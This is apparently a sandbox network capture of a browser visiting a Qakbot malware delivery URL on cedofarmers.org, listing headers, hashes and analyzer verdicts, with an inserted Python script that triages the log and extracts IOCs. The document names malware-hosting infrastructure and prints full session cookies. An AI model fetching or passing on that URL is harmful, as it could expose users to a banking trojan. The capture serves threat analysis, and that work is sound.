r3.o.lencr.org/
23.36.76.226  200 OK  503 B  IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
MD5    c7a8ba48383a0e56baca8c8c41b81a04
SHA1   b04c1f1e730a71f17ff639c9db697c532d4e5421
SHA256 7860552382285e6eddddc5226c6f6400caa3f6fc3cb4b8a2d550c6fc653f78bb
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "7860552382285E6EDDDDC5226C6F6400CAA3F6FC3CB4B8A2D550C6FC653F78BB"
Last-Modified: Sun, 06 Nov 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2391
Expires: Tue, 08 Nov 2022 23:00:26 GMT
Date: Tue, 08 Nov 2022 22:20:35 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29  200 OK  471 B  IP 93.184.220.29:0
MD5    7908acd0c083145e2b454aaeb063c236
SHA1   0696647bb0a4118327f637a50ebcc21bac39d592
SHA256 ffc30b68df0b33d67f31e37bbf5ae5cf4c23e1c8b8197bf76a95ee06bec4cd36
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6364
Cache-Control: max-age=136600
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:35 GMT
Etag: "636a2fef-1d7"
Expires: Thu, 10 Nov 2022 12:17:15 GMT
Last-Modified: Tue, 08 Nov 2022 10:31:11 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
ocsp.digicert.com/
93.184.220.29  200 OK  471 B  IP 93.184.220.29:0
MD5    7908acd0c083145e2b454aaeb063c236
SHA1   0696647bb0a4118327f637a50ebcc21bac39d592
SHA256 ffc30b68df0b33d67f31e37bbf5ae5cf4c23e1c8b8197bf76a95ee06bec4cd36
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6364
Cache-Control: max-age=136600
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:35 GMT
Etag: "636a2fef-1d7"
Expires: Thu, 10 Nov 2022 12:17:15 GMT
Last-Modified: Tue, 08 Nov 2022 10:31:11 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
r3.o.lencr.org/
23.36.76.226  200 OK  503 B  IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
MD5    9a21dcd6794c5ba4178522096f695511
SHA1   d731cf49db5e048d0d820d5cee03417cdd8c1c7b
SHA256 c4981ce849fcfce045d1c9eeb2978767d87fcbf6087626f3d6541ec8b1938a37
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "C4981CE849FCFCE045D1C9EEB2978767D87FCBF6087626F3D6541EC8B1938A37"
Last-Modified: Sun, 06 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12102
Expires: Wed, 09 Nov 2022 01:42:17 GMT
Date: Tue, 08 Nov 2022 22:20:35 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain
34.160.144.191  200 OK  5.3 kB  URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain
IP 34.160.144.191:0
File type PEM certificate, ASCII text
MD5    67d5a988edcda47bc3b3b3f65d32b4b6
SHA1   d4f0e0da8b3690cc7da925026d3414b68c7d954f
SHA256 55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: Ns+dhON4MlIbzDiirZjtYMnmXgrZ2ES0rAl5BiRVlaCbJE9yt1TnfkvaVM9ZjVYy5JknEZwIptU=
x-amz-request-id: 637HB8ZBZQANAMXM
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Tue, 08 Nov 2022 21:48:40 GMT
age: 1915
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239  200 OK  12 B  URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data, ASCII text, with no line terminators
MD5    23e88fb7b99543fb33315b29b1fad9d6
SHA1   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
SHA256 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Tue, 08 Nov 2022 22:20:35 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
cedofarmers.org/tmiu/qakbot.zip
192.185.57.117  301 Moved Permanently  241 B  URL HTTP/1.1 cedofarmers.org/tmiu/qakbot.zip
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text (exported SGML document), ASCII text
MD5    143e857dedbeba8a9afd5e4b6a4ec3c7
SHA1   739291f581c628a095ae9dbb766b86c3f971ef7c
SHA256 42f51bd1ae4ade0a86552ab214350f8a4f8c8de6645618d8d96cc41f47d37bbe
Analyzer      Verdict    Alert
fortinet      Malware
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /tmiu/qakbot.zip HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Nov 2022 22:20:35 GMT
Server: Apache
Location: https://cedofarmers.org/index.php
Content-Length: 241
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
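This entry is the one that matters in the capture: the Qakbot delivery URL no longer serves an archive but answers 301 to the site's index page, the domain is already sinkholed by both DNS analyzers and flagged by Fortinet, and almost every other record is stock Firefox background traffic (OCSP responders, the remote-settings signing chain, sponsored tiles, the push WebSocket). The script below is an added example, not part of the capture and not a sandbox vendor's tooling: it parses this log format (including the extractor's fused "IP+status" lines and wrapped Set-Cookie headers), separates known browser noise from requests worth reviewing, and collects IOCs together with the analyzer verdicts. BROWSER_NOISE is an assumed allow-list, and SAMPLE_LOG is a constructed excerpt of the records on this page with headers trimmed and cookie values shortened.

```python
import re
# Hosts a stock Firefox contacts by itself (OCSP, remote-settings, tiles, push);
# an assumed allow-list for this example, extend it for your own fleet.
BROWSER_NOISE = {"r3.o.lencr.org", "ocsp.digicert.com", "push.services.mozilla.com",
                 "content-signature-2.cdn.mozilla.net", "contile.services.mozilla.com"}
URL_LINE = re.compile(r"^[A-Za-z0-9.-]+(?:/\S*)?$")
# The extractor fused IP and status ("23.36.76.226200 OK"); \d{1,3} per octet splits them.
IP_LINE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*(?P<status>\d{3})\b")
REQ_LINE = re.compile(r"^(?:GET|POST|HEAD|PUT|OPTIONS) \S+ HTTP/\d(?:\.\d)?$")
RESP_LINE = re.compile(r"^HTTP/\d(?:\.\d)? \d{3}")
HASH_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}
PAYLOAD_EXT = re.compile(r"\.(?:zip|rar|7z|iso|img)$", re.I)

def host_of(entry):
    return entry["url"].split("/", 1)[0]

def _add_header(headers, line, last):
    # 'Name: value' -> headers[name] (list). A line without ': ' continues the
    # previous header (the log wraps long Set-Cookie values). Returns that name.
    if ": " in line:
        name, value = line.split(": ", 1)
        headers.setdefault(name.lower(), []).append(value)
        return name.lower()
    if last:
        headers[last].append(line)
    return last

def _add_meta(e, line):
    if m := IP_LINE.match(line):
        e["ip"], e["status"] = m["ip"], int(m["status"])
    else:   # "Hash <md5>" and the bare sha1 / sha256 lines; other meta lines are ignored
        tok = line.split()[-1]
        if re.fullmatch(r"[0-9a-f]+", tok) and len(tok) in HASH_BY_LEN:
            e["hashes"][HASH_BY_LEN[len(tok)]] = tok

def parse_log(text):
    """One dict per request: url, ip, status, hashes, verdicts, req and resp headers."""
    lines = [l.strip() for l in text.splitlines()]
    entries, cur, section, last = [], None, "meta", ""
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if URL_LINE.match(line) and IP_LINE.match(nxt):    # a record starts here
            entries.append({"url": line, "ip": "", "status": 0, "hashes": {}, "verdicts": {}, "req": {}, "resp": {}})
            cur, section = entries[-1], "meta"
        elif cur is None or not line:
            continue
        elif REQ_LINE.match(line):
            section, last = "req", ""
        elif RESP_LINE.match(line):
            section, last = "resp", ""
        elif section in ("req", "resp"):
            last = _add_header(cur[section], line, last)
        elif section == "verdicts" or line.startswith("Analyzer"):
            section = "verdicts"   # the header line carries the first row, then one row per line
            row = re.sub(r"^Analyzer\s+Verdict(?:\s+Alert)?\s*", "", line).split()
            if len(row) == 2:
                cur["verdicts"][row[0]] = row[1]
        else:
            _add_meta(cur, line)
    return entries

def report(entries):
    # Noise hosts, per-host IOCs for everything else, and plain-language triage notes.
    out = {"noise": sorted({host_of(e) for e in entries if host_of(e) in BROWSER_NOISE}),
           "iocs": {}, "notes": []}
    for e in entries:
        h = host_of(e)
        if h in BROWSER_NOISE:
            continue
        rec = out["iocs"].setdefault(h, {"ips": set(), "urls": set(), "sha256": set(), "verdicts": {}})
        rec["ips"].add(e["ip"]); rec["urls"].add(e["url"]); rec["verdicts"].update(e["verdicts"])
        if "sha256" in e["hashes"]:
            rec["sha256"].add(e["hashes"]["sha256"])
        if 300 <= e["status"] < 400 and PAYLOAD_EXT.search(e["url"]):
            loc = e["resp"].get("location", ["?"])[0]
            out["notes"].append(f'{e["url"]}: payload URL answered {e["status"]} -> {loc}; no archive served')
        names = [c.split("=", 1)[0] for c in e["resp"].get("set-cookie", []) if "=" in c]
        if "laravel_session" in names:
            out["notes"].append(f"{h}: sets {', '.join(names)} -> Laravel application")
    return out

# Constructed excerpt of the capture above (headers trimmed, cookie values shortened).
SAMPLE_LOG = """\
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
cedofarmers.org/tmiu/qakbot.zip
192.185.57.117301 Moved Permanently 241 B URL HTTP/1.1 cedofarmers.org/tmiu/qakbot.zip
Hash 143e857dedbeba8a9afd5e4b6a4ec3c7
42f51bd1ae4ade0a86552ab214350f8a4f8c8de6645618d8d96cc41f47d37bbe
Analyzer Verdict Alert fortinet Malware
quad9 Sinkholed
GET /tmiu/qakbot.zip HTTP/1.1
HTTP/1.1 301 Moved Permanently
Location: https://cedofarmers.org/index.php
cedofarmers.org/index.php
192.185.57.117200 OK 6.1 kB URL HTTP/2 cedofarmers.org/index.php
HTTP/2 200 OK
set-cookie: XSRF-TOKEN=eyJpdiI6...; expires=Wed, 09-Nov-2022 00:20:36 GMT; path=/; samesite=lax
laravel_session=eyJpdiI6...; Max-Age=7200; path=/; httponly; samesite=lax
"""
```

Run it on a saved copy of the page with `report(parse_log(open("capture.txt").read()))`; the result lists the noise hosts, one IOC record per remaining host (IPs, URLs, SHA-256 of served bodies, merged verdicts) and the two notes a triager would write for this capture: the .zip URL redirected to index.php without serving an archive, and the XSRF-TOKEN / laravel_session cookies identifying the site as a Laravel application. Record boundaries are detected from a URL-shaped line immediately followed by an IP line, so bare hash lines (which also look URL-shaped) are not mistaken for new records.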
r3.o.lencr.org/
23.36.76.226  200 OK  503 B  IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
MD5    17a694f272f175c24d486240fe3fbeb8
SHA1   d9d41d9e1024dcd836c2b2fd95341736d539c606
SHA256 7c99cf1bf90d0425556667f9a7c6dc7319d013a9d0f6c94baa8bc0deb49d22c7
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "7C99CF1BF90D0425556667F9A7C6DC7319D013A9D0F6C94BAA8BC0DEB49D22C7"
Last-Modified: Tue, 08 Nov 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Wed, 09 Nov 2022 04:20:36 GMT
Date: Tue, 08 Nov 2022 22:20:36 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29  200 OK  471 B  IP 93.184.220.29:0
MD5    2a47d129a3af5f02c654faf925c60273
SHA1   9ad27ed9f4500c939260a677c12e702599b00fa9
SHA256 0e031af077bf7009ffefada782407a247bbd31bddc96994c68de7bfe902bf992
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 1654
Cache-Control: max-age=126824
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:36 GMT
Etag: "636a1c26-1d7"
Expires: Thu, 10 Nov 2022 09:34:20 GMT
Last-Modified: Tue, 08 Nov 2022 09:06:46 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
cedofarmers.org/index.php
192.185.57.117  200 OK  6.1 kB  URL HTTP/2 cedofarmers.org/index.php
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text (exported SGML document), ASCII text, with very long lines (535), with CRLF, LF line terminators
MD5    029b32b1c044a1137c3278212e0ebc26
SHA1   a87198ef26fc15df2cc5d3c40fb45f3199cd1d97
SHA256 edcb2372b5af7ec52e60e688e373910580cf796aa693e440cfad177381268c1c
Analyzer      Verdict    Alert
fortinet      Malware
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /index.php HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 200 OK
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:36 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; expires=Wed, 09-Nov-2022 00:20:36 GMT; Max-Age=7200; path=/; samesite=lax
laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D; expires=Wed, 09-Nov-2022 00:20:36 GMT; Max-Age=7200; path=/; httponly; samesite=lax
vary: Accept-Encoding
content-encoding: gzip
content-length: 6098
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
push.services.mozilla.com/
34.214.64.191  101 Switching Protocols  0 B  URL HTTP/1.1 push.services.mozilla.com/
IP 34.214.64.191:0
MD5    d41d8cd98f00b204e9800998ecf8427e   (digests of an empty body: the 101 response carries no content)
SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: t82PsSWsE9ACaTUp3sNazQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 2m01G02ZcgJtugcOBHRg603dM3c=
cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
104.17.24.14  200 OK  5.6 kB  URL HTTP/2 cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
IP 104.17.24.14:0
File type ASCII text, with very long lines (30837)
MD5    109d1ed85cd01f9cdab73a4cac5bf80d
SHA1   d6c6498ad46de2d8e2008a8ff68e364ae7f16b32
SHA256 8b3a74fe462f5b3c0635995fd721a60eb640e237680b0b532b96711f2823e8bc
GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Tue, 08 Nov 2022 22:20:36 GMT
content-type: text/css; charset=utf-8
content-length: 5631
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03e5f-7918"
last-modified: Mon, 04 May 2020 16:10:07 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 539580
expires: Sun, 29 Oct 2023 22:20:36 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GcFHYuqnWpGqIkzL4mH7Z7vjSD8%2F7pLtm7Fdcks8yMPfuatHHpVQ0cRFc1v2AWbaV5B6kpI37FG2ftL660HzX8jofeF4WBcs4Ri92bHtsdKL%2FsXadae4GV%2BvPWRpcrQnjrHnmV3l"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 7671b269fca4b4eb-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/css/owl.carousel.min.css
192.185.57.117  200 OK  1.1 kB  URL HTTP/2 cedofarmers.org/css/owl.carousel.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (3350)
MD5    e95f3bc7f5a4daefb4a7c59bf8f346d6
SHA1   393cd6eb55cb32c8932a8c6d1a6c2b249ae51629
SHA256 9e27608f367fb404f42a20c441190981860399a8efbb54b30cdb56a8e7e191da
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/owl.carousel.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 1098
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/open-iconic-bootstrap.min.css
192.185.57.117  200 OK  2.0 kB  URL HTTP/2 cedofarmers.org/css/open-iconic-bootstrap.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (9467), with no line terminators
MD5    1a49150e9f9aec5c1fe7943c7368e096
SHA1   065b59678676666e6509b064bcc576eb4bec6aa1
SHA256 6e94ff0f08e65917674594e6e5b98d707a96a427003598c26f0ab537318abac7
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/open-iconic-bootstrap.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2034
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/slide.css
192.185.57.117  200 OK  516 B  URL HTTP/2 cedofarmers.org/css/slide.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
MD5    026248c5259afb78149df842131c47ab
SHA1   0a8a946962d23bb631fe7d4d192f7b7539dbf3b7
SHA256 92f5e24d85a907f8ad1ba478ba86c417c5fca3a06719481adacea0bce3431656
Analyzer      Verdict    Alert
mnemonic_dns  Sinkholed
quad9         Sinkholed
GET /css/slide.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
